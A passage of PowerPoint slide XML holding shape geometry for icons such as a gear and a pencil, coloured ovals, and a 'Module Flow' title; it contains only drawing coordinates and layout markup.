            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8839200" y="3847800"/>
              <a:ext cx="648000" cy="648000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="195927" h="195927">
                  <a:moveTo>
                    <a:pt x="97964" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="116200" y="208"/>
                    <a:pt x="132679" y="4667"/>
                    <a:pt x="147399" y="13379"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162120" y="22090"/>
                    <a:pt x="173837" y="33807"/>
                    <a:pt x="182548" y="48528"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191260" y="63248"/>
                    <a:pt x="195719" y="79727"/>
                    <a:pt x="195927" y="97963"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195719" y="116199"/>
                    <a:pt x="191260" y="132677"/>
                    <a:pt x="182548" y="147398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173837" y="162119"/>
                    <a:pt x="162120" y="173836"/>
                    <a:pt x="147399" y="182547"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132679" y="191259"/>
                    <a:pt x="116200" y="195719"/>
                    <a:pt x="97964" y="195927"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="79728" y="195719"/>
                    <a:pt x="63250" y="191259"/>
                    <a:pt x="48529" y="182547"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33808" y="173836"/>
                    <a:pt x="22091" y="162119"/>
                    <a:pt x="13380" y="147398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4668" y="132677"/>
                    <a:pt x="208" y="116199"/>
                    <a:pt x="0" y="97963"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="79727"/>
                    <a:pt x="4668" y="63248"/>
                    <a:pt x="13380" y="48528"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22091" y="33807"/>
                    <a:pt x="33808" y="22090"/>
                    <a:pt x="48529" y="13379"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63250" y="4667"/>
                    <a:pt x="79728" y="208"/>
                    <a:pt x="979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914217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1828434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2742651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3656868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4571086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5485303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6399520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7313737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609539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tr-TR" sz="120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45" name="Freeform 110">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A9F331B-FF23-44BA-8C71-50C97F7D09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59556" y="3954930"/>
              <a:ext cx="426984" cy="423648"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="284" y="107"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="295" y="86"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="302" y="60"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="277" y="35"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="252" y="44"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="208" y="46"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="199" y="22"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="188" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="150" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="139" y="22"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="110" y="55"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="87" y="44"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="61" y="37"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="36" y="62"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="45" y="86"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="45" y="129"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="23" y="138"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="149"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="185"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="23" y="196"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="54" y="225"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="45" y="249"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="36" y="272"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="63" y="298"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="87" y="291"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="130" y="289"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="141" y="310"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="152" y="334"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="188" y="334"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="199" y="310"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="230" y="280"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="253" y="289"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="277" y="298"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="304" y="271"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="295" y="247"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="293" y="205"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="317" y="196"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="340" y="184"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="340" y="147"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="317" y="136"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="293" y="129"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="224" y="167"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="219" y="187"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="208" y="205"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="190" y="216"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="170" y="220"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="159" y="220"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="139" y="211"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="125" y="196"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="116" y="178"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="116" y="167"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="119" y="145"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="130" y="129"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="148" y="118"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="170" y="113"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="181" y="115"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="201" y="122"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="215" y="136"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="223" y="156"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="224" y="167"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="340" h="334">
                  <a:moveTo>
                    <a:pt x="293" y="129"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="284" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295" y="86"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300" y="69"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302" y="60"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277" y="35"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277" y="35"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="55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199" y="22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188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46" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139" y="22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130" y="46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87" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70" y="39"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="37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8" y="71"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="86"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23" y="138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47" y="205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38" y="265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70" y="296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87" y="291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141" y="310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146" y="327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152" y="334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199" y="310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270" y="296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277" y="298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304" y="271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304" y="271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302" y="263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295" y="247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284" y="225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293" y="205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293" y="205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333" y="189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340" y="147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340" y="147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333" y="144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317" y="136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293" y="129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293" y="129"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="224" y="167"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="224" y="167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223" y="178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208" y="205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201" y="211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190" y="216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181" y="220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159" y="220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148" y="216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139" y="211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130" y="205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130" y="129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139" y="122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148" y="118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159" y="115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170" y="113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181" y="115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190" y="118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201" y="122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208" y="129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223" y="156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224" y="167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224" y="16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2400"/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E44EF821-7399-47AA-87EF-420C8EF6C3DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8829797" y="5658394"/>
            <a:ext cx="666206" cy="666206"/>
            <a:chOff x="8858794" y="5658394"/>
            <a:chExt cx="666206" cy="666206"/>
          </a:xfrm>
        </p:grpSpPr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C598DEEA-177B-46B4-8929-EC366A962257}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8858794" y="5658394"/>
              <a:ext cx="666206" cy="666206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914217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1828434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2742651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3656868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4571086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5485303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6399520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7313737" algn="l" defTabSz="1828434" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:defRPr sz="36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0" name="Freeform 72">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E370D152-3F8C-46DC-B8C9-23B201C92B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3068" y="5809066"/>
              <a:ext cx="410153" cy="351478"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 172392 w 64"/>
                <a:gd name="T1" fmla="*/ 140385 h 51"/>
                <a:gd name="T2" fmla="*/ 137914 w 64"/>
                <a:gd name="T3" fmla="*/ 174625 h 51"/>
                <a:gd name="T4" fmla="*/ 34478 w 64"/>
                <a:gd name="T5" fmla="*/ 174625 h 51"/>
                <a:gd name="T6" fmla="*/ 0 w 64"/>
                <a:gd name="T7" fmla="*/ 140385 h 51"/>
                <a:gd name="T8" fmla="*/ 0 w 64"/>
                <a:gd name="T9" fmla="*/ 37664 h 51"/>
                <a:gd name="T10" fmla="*/ 34478 w 64"/>
                <a:gd name="T11" fmla="*/ 3424 h 51"/>
                <a:gd name="T12" fmla="*/ 137914 w 64"/>
                <a:gd name="T13" fmla="*/ 3424 h 51"/>
                <a:gd name="T14" fmla="*/ 151705 w 64"/>
                <a:gd name="T15" fmla="*/ 3424 h 51"/>
                <a:gd name="T16" fmla="*/ 155153 w 64"/>
                <a:gd name="T17" fmla="*/ 6848 h 51"/>
                <a:gd name="T18" fmla="*/ 151705 w 64"/>
                <a:gd name="T19" fmla="*/ 10272 h 51"/>
                <a:gd name="T20" fmla="*/ 148257 w 64"/>
                <a:gd name="T21" fmla="*/ 17120 h 51"/>
                <a:gd name="T22" fmla="*/ 141362 w 64"/>
                <a:gd name="T23" fmla="*/ 17120 h 51"/>
                <a:gd name="T24" fmla="*/ 137914 w 64"/>
                <a:gd name="T25" fmla="*/ 17120 h 51"/>
                <a:gd name="T26" fmla="*/ 34478 w 64"/>
                <a:gd name="T27" fmla="*/ 17120 h 51"/>
                <a:gd name="T28" fmla="*/ 13791 w 64"/>
                <a:gd name="T29" fmla="*/ 37664 h 51"/>
                <a:gd name="T30" fmla="*/ 13791 w 64"/>
                <a:gd name="T31" fmla="*/ 140385 h 51"/>
                <a:gd name="T32" fmla="*/ 34478 w 64"/>
                <a:gd name="T33" fmla="*/ 157505 h 51"/>
                <a:gd name="T34" fmla="*/ 137914 w 64"/>
                <a:gd name="T35" fmla="*/ 157505 h 51"/>
                <a:gd name="T36" fmla="*/ 155153 w 64"/>
                <a:gd name="T37" fmla="*/ 140385 h 51"/>
                <a:gd name="T38" fmla="*/ 155153 w 64"/>
                <a:gd name="T39" fmla="*/ 123265 h 51"/>
                <a:gd name="T40" fmla="*/ 158601 w 64"/>
                <a:gd name="T41" fmla="*/ 119841 h 51"/>
                <a:gd name="T42" fmla="*/ 165497 w 64"/>
                <a:gd name="T43" fmla="*/ 112993 h 51"/>
                <a:gd name="T44" fmla="*/ 168944 w 64"/>
                <a:gd name="T45" fmla="*/ 112993 h 51"/>
                <a:gd name="T46" fmla="*/ 172392 w 64"/>
                <a:gd name="T47" fmla="*/ 116417 h 51"/>
                <a:gd name="T48" fmla="*/ 172392 w 64"/>
                <a:gd name="T49" fmla="*/ 140385 h 51"/>
                <a:gd name="T50" fmla="*/ 196527 w 64"/>
                <a:gd name="T51" fmla="*/ 61632 h 51"/>
                <a:gd name="T52" fmla="*/ 113779 w 64"/>
                <a:gd name="T53" fmla="*/ 143809 h 51"/>
                <a:gd name="T54" fmla="*/ 79300 w 64"/>
                <a:gd name="T55" fmla="*/ 143809 h 51"/>
                <a:gd name="T56" fmla="*/ 79300 w 64"/>
                <a:gd name="T57" fmla="*/ 106145 h 51"/>
                <a:gd name="T58" fmla="*/ 162049 w 64"/>
                <a:gd name="T59" fmla="*/ 23968 h 51"/>
                <a:gd name="T60" fmla="*/ 196527 w 64"/>
                <a:gd name="T61" fmla="*/ 61632 h 51"/>
                <a:gd name="T62" fmla="*/ 124122 w 64"/>
                <a:gd name="T63" fmla="*/ 116417 h 51"/>
                <a:gd name="T64" fmla="*/ 103435 w 64"/>
                <a:gd name="T65" fmla="*/ 99297 h 51"/>
                <a:gd name="T66" fmla="*/ 89644 w 64"/>
                <a:gd name="T67" fmla="*/ 112993 h 51"/>
                <a:gd name="T68" fmla="*/ 89644 w 64"/>
                <a:gd name="T69" fmla="*/ 119841 h 51"/>
                <a:gd name="T70" fmla="*/ 99987 w 64"/>
                <a:gd name="T71" fmla="*/ 119841 h 51"/>
                <a:gd name="T72" fmla="*/ 99987 w 64"/>
                <a:gd name="T73" fmla="*/ 130113 h 51"/>
                <a:gd name="T74" fmla="*/ 106883 w 64"/>
                <a:gd name="T75" fmla="*/ 130113 h 51"/>
                <a:gd name="T76" fmla="*/ 124122 w 64"/>
                <a:gd name="T77" fmla="*/ 116417 h 51"/>
                <a:gd name="T78" fmla="*/ 158601 w 64"/>
                <a:gd name="T79" fmla="*/ 44512 h 51"/>
                <a:gd name="T80" fmla="*/ 117227 w 64"/>
                <a:gd name="T81" fmla="*/ 85600 h 51"/>
                <a:gd name="T82" fmla="*/ 113779 w 64"/>
                <a:gd name="T83" fmla="*/ 89025 h 51"/>
                <a:gd name="T84" fmla="*/ 120675 w 64"/>
                <a:gd name="T85" fmla="*/ 89025 h 51"/>
                <a:gd name="T86" fmla="*/ 162049 w 64"/>
                <a:gd name="T87" fmla="*/ 47936 h 51"/>
                <a:gd name="T88" fmla="*/ 162049 w 64"/>
                <a:gd name="T89" fmla="*/ 44512 h 51"/>
                <a:gd name="T90" fmla="*/ 158601 w 64"/>
                <a:gd name="T91" fmla="*/ 44512 h 51"/>
                <a:gd name="T92" fmla="*/ 203423 w 64"/>
                <a:gd name="T93" fmla="*/ 51360 h 51"/>
                <a:gd name="T94" fmla="*/ 168944 w 64"/>
                <a:gd name="T95" fmla="*/ 17120 h 51"/>
                <a:gd name="T96" fmla="*/ 179288 w 64"/>
                <a:gd name="T97" fmla="*/ 6848 h 51"/>
                <a:gd name="T98" fmla="*/ 196527 w 64"/>
                <a:gd name="T99" fmla="*/ 6848 h 51"/>
                <a:gd name="T100" fmla="*/ 213766 w 64"/>
                <a:gd name="T101" fmla="*/ 23968 h 51"/>
                <a:gd name="T102" fmla="*/ 213766 w 64"/>
                <a:gd name="T103" fmla="*/ 41088 h 51"/>
                <a:gd name="T104" fmla="*/ 203423 w 64"/>
                <a:gd name="T105" fmla="*/ 51360 h 5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4" h="51">
                  <a:moveTo>
                    <a:pt x="50" y="41"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="46"/>
                    <a:pt x="45" y="51"/>
                    <a:pt x="4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4" y="51"/>
                    <a:pt x="0" y="46"/>
                    <a:pt x="0" y="4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4" y="1"/>
                    <a:pt x="1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1" y="1"/>
                    <a:pt x="43" y="1"/>
                    <a:pt x="44" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="2"/>
                    <a:pt x="44" y="2"/>
                    <a:pt x="45" y="2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2" y="5"/>
                    <a:pt x="42" y="5"/>
                    <a:pt x="41" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="5"/>
                    <a:pt x="40" y="5"/>
                    <a:pt x="4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7" y="5"/>
                    <a:pt x="4" y="8"/>
                    <a:pt x="4" y="1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4"/>
                    <a:pt x="7" y="46"/>
                    <a:pt x="1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3" y="46"/>
                    <a:pt x="45" y="44"/>
                    <a:pt x="45" y="41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6" y="35"/>
                    <a:pt x="46" y="35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3"/>
                    <a:pt x="49" y="33"/>
                    <a:pt x="49" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="33"/>
                    <a:pt x="50" y="33"/>
                    <a:pt x="50" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="50" y="41"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="57" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="42"/>
                    <a:pt x="33" y="42"/>
                    <a:pt x="33" y="42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47" y="7"/>
                    <a:pt x="47" y="7"/>
                    <a:pt x="47" y="7"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57" y="18"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="34"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="29"/>
                    <a:pt x="30" y="29"/>
                    <a:pt x="30" y="29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31" y="38"/>
                    <a:pt x="31" y="38"/>
                    <a:pt x="31" y="38"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="36" y="34"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="46" y="13"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="25"/>
                    <a:pt x="34" y="25"/>
                    <a:pt x="34" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="25"/>
                    <a:pt x="33" y="26"/>
                    <a:pt x="33" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="27"/>
                    <a:pt x="34" y="27"/>
                    <a:pt x="35" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="14"/>
                    <a:pt x="47" y="14"/>
                    <a:pt x="47" y="14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7" y="12"/>
                    <a:pt x="46" y="12"/>
                    <a:pt x="46" y="13"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="59" y="15"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="5"/>
                    <a:pt x="49" y="5"/>
                    <a:pt x="49" y="5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3" y="0"/>
                    <a:pt x="56" y="0"/>
                    <a:pt x="57" y="2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4" y="9"/>
                    <a:pt x="64" y="11"/>
                    <a:pt x="62" y="12"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="59" y="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29254725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Rectangle 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{492F9220-FD9E-489E-AF7E-DBE5DD5CF61B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8527396" y="4001532"/>
            <a:ext cx="3420763" cy="99433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>
            <a:scene3d>
              <a:camera prst="perspectiveAbove"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene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4523584" y="221787"/>
            <a:ext cx="3144836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rPr>
              <a:t>Module Flow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1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81" name="Oval 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3632813" y="3354600"/>
            <a:ext cx="551839" cy="551839"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>
          </a:solidFill>
          <a:ln w="38100"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8" name="Oval 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2877160" y="4885888"/>
            <a:ext cx="551839" cy="551839"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="3810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9" name="Oval 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7900848" y="2514600"/>
            <a:ext cx="551839" cy="551839"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
          <a:ln w="381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" name="Oval 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
